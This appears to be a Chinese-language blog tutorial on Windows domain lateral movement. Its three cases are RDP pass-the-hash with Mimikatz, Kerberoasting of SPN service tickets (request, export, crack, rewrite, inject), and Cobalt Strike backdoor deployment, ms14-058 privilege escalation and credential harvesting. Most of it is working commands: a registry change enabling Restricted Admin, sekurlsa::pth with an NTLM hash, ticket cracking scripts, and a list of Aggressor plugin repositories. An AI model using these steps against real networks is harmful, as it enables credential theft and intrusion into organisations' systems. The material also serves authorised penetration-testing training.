案例1-域横向移动RDP传递-Mimikatz
除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。
RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断
当得到密码时,如果对方开启了3389端口,可以直接进行连接并登陆
RDP明文密码链接
1.windows: mstsc
2.mstsc.exe /console /v:192.168.3.21 /admin
3.linux: rdesktop 192.168.3.21:3389
RDP密文HASH链接
windows Server需要开启 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默认开启,
同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持;
开启命令:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
开启后运行:
1.mstsc.exe /restrictedadmin
2.mimikatz.exe
3.privilege::debug
4.sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"
案例2-域横向移动SPN服务-探针,请求,导出,破解,重写
1探针
setspn -q */*
setspn -q */* | findstr "MSSQL"
2请求票据
# 删除缓存票据
klist purge
# powershell请求
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"
# mimikatz请求
mimikatz.exe "kerberos::ask /target:xxxx"
# 查看票据
klist
3导出票据
# mimikatz
mimikatz.exe "kerberos::list /export"
4破解票据
# 破解工具tgsrepcrack.py python3环境运行
python tgsrepcrack.py passwd.txt xxxx.kirbi
python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerry@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi
5重写票据
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存
6利用
dir //xxx.xxx.xxx.xxx/c$
查看域内所有SPN服务列表
查看域内指定的spn服务
案例3-域横向移动测试流程一把梭哈-CobaltStrike初体验
1.关于启动及配置讲解
linux上需配置java环境才可启动
linux上启动后,本地打开bat文件
输入linux的ip以及设置的密码即可连接打开
因为这是一个团队工具,可以多人去连接linux上的CobaltStrike
可以通过配置监听器来区分自己与别人攻击的目标
HTTP Hosts为生成的后门执行后回弹的ip,保存后即对设置的ip进行监听
生成后门
将生成的后门与监听器绑定,当这个后门触发后,绑定的对应监听器就会上线
将后门上传到目标主机并执行,执行后这里显示目标已经上线
进入命令终端
2.关于提权及插件加载
提权
打开后,自带的插件只有两个
可手动导入插件
选择插件目录中的cna文件
选中插件,点击upload加载
重新打开,选择相应的exp进行攻击
选择对应的监听器,攻击成功后进行回弹
点击后,就会用ms14-058对目标主机进行攻击
如果速度过慢的话,这里把sleep设置为1或者0
此时图标上多了一个连接的用户为system,证明已经提权成功
可以打开命令窗口执行命令
3.关于信息收集命令讲解
通过命令net view探针当前的网络环境
可以通过targets查看,查看当前所有探针的信息,非常方便
net dclist获取当前域控主机信息
shell net user /domain
调用cmd去执行net use /domain命令,获取域内所有用户名称
将mimikatz上传后,可直接通过CobaltStrike去执行
执行完后可通过此处直接查看mimikatz收集的信息
对192.168.3.32进行攻击
选择之前通过mimikatz获取的其他主机的口令密码尝试连接
Listener:选择监听器
Session:选择通过哪个主机的权限去连接攻击目标机
4.通过第三方工具
上面通过密码尝试连接时,总不能一个一个密码手动去尝试连接,所以可以借助第三方工具
将第三方工具文件上传到主机
CobaltStrike Aggressor 脚本合集(可以自行在GitHub搜索):
https://github.com/harleyQu1nn/AggressorScripts
https://github.com/Und3rf10w/Aggressor-scripts
https://github.com/001SPARTaN/aggressor_scripts
https://github.com/rasta-mouse/Aggressor-Script
https://github.com/threatexpress/aggressor-scripts
https://github.com/ramen0x3f/AggressorScripts
https://github.com/FortyNorthSecurity/AggressorAssessor
https://github.com/michalkoczwara/aggressor_scripts_collection
https://github.com/ars3n11/Aggressor-Scripts
https://github.com/gaudard/scripts/tree/master/red-team/aggressor
https://github.com/bluscreenofjeff/AggressorScripts
https://github.com/vysecurity/Aggressor-VYSEC
https://github.com/killswitch-GUI/CobaltStrike-ToolKit
https://github.com/rsmudge/ElevateKit (第三方提权攻击)
https://github.com/QAX-A-Team/CobaltStrike-Toolset
https://github.com/DeEpinGh0st/Erebus (Erebus CobaltStrike后渗透测试插件,持续更新)
https://github.com/branthale/CobaltStrikeCNA
https://github.com/pandasec888/taowu-cobalt-strike(仓库已关闭)
571
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
